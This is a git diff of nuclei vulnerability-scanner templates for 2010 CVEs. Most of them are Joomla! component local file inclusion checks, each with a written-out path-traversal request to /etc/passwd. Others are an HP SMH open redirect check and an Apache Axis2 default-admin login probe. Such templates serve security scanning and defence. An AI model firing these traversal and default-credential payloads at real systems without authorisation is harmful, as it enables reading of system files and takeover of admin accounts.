name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. - reference: + description: Directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. + reference: | - https://www.exploit-db.com/exploits/12232 - https://www.cvedetails.com/cve/CVE-2010-1461 - - http://web.archive.org/web/20210518110953/https://www.securityfocus.com/bid/39504 - - http://www.securityfocus.com/bid/39504 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1461 tags: cve,cve2010,joomla,lfi,photo + requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1470.yaml b/nuclei-templates/CVE-2010/CVE-2010-1470.yaml index f5117822e8..bcb3e84703 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-1470.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-1470.yaml @@ -4,27 +4,24 @@ info: name: Joomla! Component Web TV 1.0 - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php. + description: Directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12166 - https://www.cvedetails.com/cve/CVE-2010-1470 - - http://web.archive.org/web/20140723205548/http://secunia.com/advisories/39405/ - - http://www.exploit-db.com/exploits/12166 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1470 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/cve-2010-1475.yaml b/nuclei-templates/CVE-2010/CVE-2010-1475.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1475.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1475.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1495.yaml b/nuclei-templates/CVE-2010/CVE-2010-1495.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1495.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1495.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1532.yaml b/nuclei-templates/CVE-2010/CVE-2010-1532.yaml deleted file mode 100644 index 1dd4120e53..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1532.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2010-1532 -info: - name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12118 - - https://www.cvedetails.com/cve/CVE-2010-1532 - - http://packetstormsecurity.org/1004-exploits/joomlapowermail-lfi.txt - - http://www.securityfocus.com/bid/39348 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1532 - tags: cve,cve2010,joomla,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/15 diff --git a/nuclei-templates/CVE-2010/cve-2010-1535.yaml b/nuclei-templates/CVE-2010/CVE-2010-1535.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1535.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1535.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1540.yaml b/nuclei-templates/CVE-2010/CVE-2010-1540.yaml index 7871928c1d..b0afe05f6e 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-1540.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-1540.yaml @@ -4,25 +4,24 @@ info: name: Joomla! Component com_blog - Directory Traversal author: daffainfo severity: high - description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. + description: Directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. reference: | - https://www.exploit-db.com/exploits/11625 - https://www.cvedetails.com/cve/CVE-2010-1540 tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1540 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - - 200 - -# Enhanced by mp on 2022/03/06 + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/CVE-2010-1586.yaml b/nuclei-templates/CVE-2010/CVE-2010-1586.yaml index 33a06a0e5a..e9c3e2cc65 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-1586.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-1586.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in red2301.html in HP System Management Homepage (SMH) 2.x.x.x allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the RedirectUrl parameter. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the download of malware. remediation: | Apply the latest patches or updates provided by HP to fix the open redirect vulnerability. reference: @@ -18,7 +20,7 @@ info: cve-id: CVE-2010-1586 cwe-id: CWE-20 epss-score: 0.00917 - epss-percentile: 0.81069 + epss-percentile: 0.81107 cpe: cpe:2.3:a:hp:system_management_homepage:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -36,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a0047304502205fdd4121663fbd64ae9fb4e66a5e4d45fdb1484a760f41f18860433f6eafc27b022100fb6ccc141275cfd7c8b4c0624a6014ca38802fce342933ae142d9bedabd3440a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f57a607443ab3d3afbecb32664f1d6143de739eaf0a9af290671f808ee175f33022100f241d17fa92db4be2755072bfe591fc4fe9d6dc10f24f02fecf152f383bc496f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-1602.yaml b/nuclei-templates/CVE-2010/CVE-2010-1602.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1602.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1602.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1603.yaml b/nuclei-templates/CVE-2010/CVE-2010-1603.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1603.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1603.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1653.yaml b/nuclei-templates/CVE-2010/CVE-2010-1653.yaml index 2c3e2fe357..fdc3e5d2a7 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-1653.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-1653.yaml @@ -4,25 +4,24 @@ info: name: Joomla! Component Graphics 1.0.6 - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: Directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information. reference: - https://www.exploit-db.com/exploits/12430 - https://www.cvedetails.com/cve/CVE-2010-1653 tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1653 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - - 200 - -# Enhanced by mp on 2022/03/23 + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-1715.yaml b/nuclei-templates/CVE-2010/CVE-2010-1715.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1715.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1715.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1722.yaml b/nuclei-templates/CVE-2010/CVE-2010-1722.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1722.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1722.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1723.yaml b/nuclei-templates/CVE-2010/CVE-2010-1723.yaml deleted file mode 100644 index 8d0c4bf2da..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1723.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2010-1723 - -info: - name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12289 - - https://www.cvedetails.com/cve/CVE-2010-1723 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1723 - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/01 diff --git a/nuclei-templates/CVE-2010/cve-2010-1870.yaml b/nuclei-templates/CVE-2010/CVE-2010-1870.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1870.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1870.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1952.yaml b/nuclei-templates/CVE-2010/CVE-2010-1952.yaml index c2a02c7a21..5e71f4a39f 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-1952.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-1952.yaml @@ -1,26 +1,27 @@ id: CVE-2010-1952 + info: name: Joomla! Component BeeHeard 1.0 - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - remediation: Upgrade to a supported version. + description: Directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12239 - https://www.cvedetails.com/cve/CVE-2010-1952 tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1952 + requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 -# Enhanced by mp on 2022/02/15 diff --git a/nuclei-templates/CVE-2010/cve-2010-1954.yaml b/nuclei-templates/CVE-2010/CVE-2010-1954.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1954.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1954.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1956.yaml b/nuclei-templates/CVE-2010/CVE-2010-1956.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1956.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1956.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1981.yaml b/nuclei-templates/CVE-2010/CVE-2010-1981.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1981.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1981.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1982.yaml b/nuclei-templates/CVE-2010/CVE-2010-1982.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1982.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1982.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-2033.yaml b/nuclei-templates/CVE-2010/CVE-2010-2033.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-2033.yaml rename to nuclei-templates/CVE-2010/CVE-2010-2033.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-2034.yaml b/nuclei-templates/CVE-2010/CVE-2010-2034.yaml index 6816c7f0fc..4600c605a4 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-2034.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-2034.yaml @@ -4,14 +4,11 @@ info: name: Joomla! Component Percha Image Attach 1.1 - Directory Traversal author: daffainfo severity: high - description: A directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - remediation: Upgrade to a supported version. + description: Directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/34003 - https://www.cvedetails.com/cve/CVE-2010-2034 tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-2034 requests: - method: GET @@ -23,10 +20,8 @@ requests: - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" - type: status status: - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/cve-2010-2035.yaml b/nuclei-templates/CVE-2010/CVE-2010-2035.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-2035.yaml rename to nuclei-templates/CVE-2010/CVE-2010-2035.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-2037.yaml b/nuclei-templates/CVE-2010/CVE-2010-2037.yaml index c5ed113fab..e3db0ee030 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-2037.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-2037.yaml @@ -1,29 +1,27 @@ id: CVE-2010-2037 + info: name: Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal author: daffainfo severity: high - description: A directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + description: Directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/34005 - https://www.cvedetails.com/cve/CVE-2010-2037 - - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244 - - http://packetstormsecurity.org/1005-exploits/joomlaperchada-lfi.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-2037 tags: cve,cve2010,lfi,joomla + requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-2045.yaml b/nuclei-templates/CVE-2010/CVE-2010-2045.yaml index 573d854a25..b40cfaab94 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-2045.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-2045.yaml @@ -1,28 +1,27 @@ id: CVE-2010-2045 + info: name: Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + description: Directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12595 - https://www.cvedetails.com/cve/CVE-2010-2045 - - http://packetstormsecurity.org/1005-exploits/joomlafdione-lfi.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-2045 tags: cve,cve2010,joomla,lfi + requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - - 200 - -# Enhanced by mp on 2022/02/17 + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/CVE-2010-2259.yaml b/nuclei-templates/CVE-2010/CVE-2010-2259.yaml deleted file mode 100644 index 0c0f4bd863..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-2259.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2010-2259 -info: - name: Joomla! Component com_bfsurvey - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/10946 - - https://www.cvedetails.com/cve/CVE-2010-2259 - - http://secunia.com/advisories/37866 - - http://www.exploit-db.com/exploits/10946 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-2259 - tags: cve,cve2010,joomla,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/cve-2010-2307.yaml b/nuclei-templates/CVE-2010/CVE-2010-2307.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-2307.yaml rename to nuclei-templates/CVE-2010/CVE-2010-2307.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-2507.yaml b/nuclei-templates/CVE-2010/CVE-2010-2507.yaml index d825dbaefc..4ff7972b09 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-2507.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-2507.yaml @@ -1,29 +1,27 @@ id: CVE-2010-2507 + info: name: Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: + description: Directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | - https://www.exploit-db.com/exploits/13981 - https://www.cvedetails.com/cve/CVE-2010-2507 - - http://secunia.com/advisories/40297 - - http://osvdb.org/65674 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-2507 tags: cve,cve2010,joomla,lfi + requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - - 200 - -# Enhanced by mp on 2022/02/17 + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-2680.yaml b/nuclei-templates/CVE-2010/CVE-2010-2680.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-2680.yaml rename to nuclei-templates/CVE-2010/CVE-2010-2680.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-2857.yaml b/nuclei-templates/CVE-2010/CVE-2010-2857.yaml deleted file mode 100644 index fc296e1ccb..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-2857.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2010-2857 - -info: - name: Joomla! Component Music Manager - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the cid parameter to album.html. - remediation: Upgrade to a supported version. - reference: - - https://www.exploit-db.com/exploits/14274 - - https://www.cvedetails.com/cve/CVE-2010-2857 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-2857 - -requests: - - method: GET - path: - - "{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-2918.yaml b/nuclei-templates/CVE-2010/CVE-2010-2918.yaml deleted file mode 100644 index 6ba32a4b2d..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-2918.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2010-2918 -info: - name: Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion - author: daffainfo - severity: high - description: A PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. - reference: - - https://www.exploit-db.com/exploits/31708 - - https://www.cvedetails.com/cve/CVE-2010-2918 - - http://web.archive.org/web/20210127190100/https://www.securityfocus.com/bid/28942/ - - https://www.exploit-db.com/exploits/14476 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-2918 - tags: cve,cve2010,joomla,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/cve-2010-2920.yaml b/nuclei-templates/CVE-2010/CVE-2010-2920.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-2920.yaml rename to nuclei-templates/CVE-2010/CVE-2010-2920.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-3426.yaml b/nuclei-templates/CVE-2010/CVE-2010-3426.yaml index e305fa4fca..9eece26cbd 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-3426.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-3426.yaml @@ -4,14 +4,11 @@ info: name: Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - remediation: Upgrade to a supported version. + description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/14964 - https://www.cvedetails.com/cve/CVE-2010-3426 tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-3426 requests: - method: GET @@ -23,10 +20,8 @@ requests: - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" - type: status status: - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/cve-2010-4617.yaml b/nuclei-templates/CVE-2010/CVE-2010-4617.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-4617.yaml rename to nuclei-templates/CVE-2010/CVE-2010-4617.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-4719.yaml b/nuclei-templates/CVE-2010/CVE-2010-4719.yaml index 70ca65fb69..145fed21d3 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-4719.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-4719.yaml @@ -4,14 +4,11 @@ info: name: Joomla! Component JRadio - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. - remediation: Upgrade to a supported version. + description: Directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/15749 - https://www.cvedetails.com/cve/CVE-2010-4719 tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-4719 requests: - method: GET @@ -23,10 +20,8 @@ requests: - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" - type: status status: - - 200 - -# Enhanced by mp on 2022/02/17 + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/CVE-2010-4977.yaml b/nuclei-templates/CVE-2010/CVE-2010-4977.yaml deleted file mode 100644 index d6a486b56c..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-4977.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2010-4977 -info: - name: Joomla! Component Canteen 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: A SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/34250 - - https://www.cvedetails.com/cve/CVE-2010-4977 - - http://www.salvatorefresta.net/files/adv/Canteen%20Joomla%20Component%201.0%20Multiple%20Remote%20Vulnerabilities-04072010.txt - - http://packetstormsecurity.org/1007-exploits/joomlacanteen-lfisql.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-4977 - tags: cve,cve2010,joomla,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/18 diff --git a/nuclei-templates/CVE-2010/cve-2010-5278.yaml b/nuclei-templates/CVE-2010/CVE-2010-5278.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-5278.yaml rename to nuclei-templates/CVE-2010/CVE-2010-5278.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-0157.yaml b/nuclei-templates/CVE-2010/cve-2010-0157.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-0157.yaml rename to nuclei-templates/CVE-2010/cve-2010-0157.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-0219.yaml b/nuclei-templates/CVE-2010/cve-2010-0219.yaml index 9e44b7dcc9..162fed1a75 100644 --- a/nuclei-templates/CVE-2010/cve-2010-0219.yaml +++ b/nuclei-templates/CVE-2010/cve-2010-0219.yaml @@ -3,16 +3,34 @@ id: CVE-2010-0219 info: name: Apache Axis2 Default Login author: pikpikcu - severity: high + severity: critical description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service. - tags: cve,cve2010,axis,apache,default-login,axis2 + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or the ability to modify or delete data. + remediation: | + Disable or restrict access to the Axis2 web interface, or apply the necessary patches or updates provided by the vendor. reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-0219 - https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html + - http://www.rapid7.com/security-center/advisories/R7-0037.jsp + - http://www.vupen.com/english/advisories/2010/2673 + - http://retrogod.altervista.org/9sg_ca_d2d.html classification: + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C + cvss-score: 10 cve-id: CVE-2010-0219 + cwe-id: CWE-255 + epss-score: 0.97509 + epss-percentile: 0.99981 + cpe: cpe:2.3:a:apache:axis2:1.3:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: apache + product: axis2 + shodan-query: http.html:"Apache Axis" + tags: cve,cve2010,axis,apache,default-login,axis2 -requests: +http: - raw: - | POST /axis2-admin/login HTTP/1.1 @@ -20,7 +38,6 @@ requests: Content-Type: application/x-www-form-urlencoded loginUsername={{username}}&loginPassword={{password}} - - | POST /axis2/axis2-admin/login HTTP/1.1 Host: {{Hostname}} @@ -37,7 +54,6 @@ requests: matchers-condition: and matchers: - - type: word words: - "

Welcome to Axis2 Web Admin Module !!

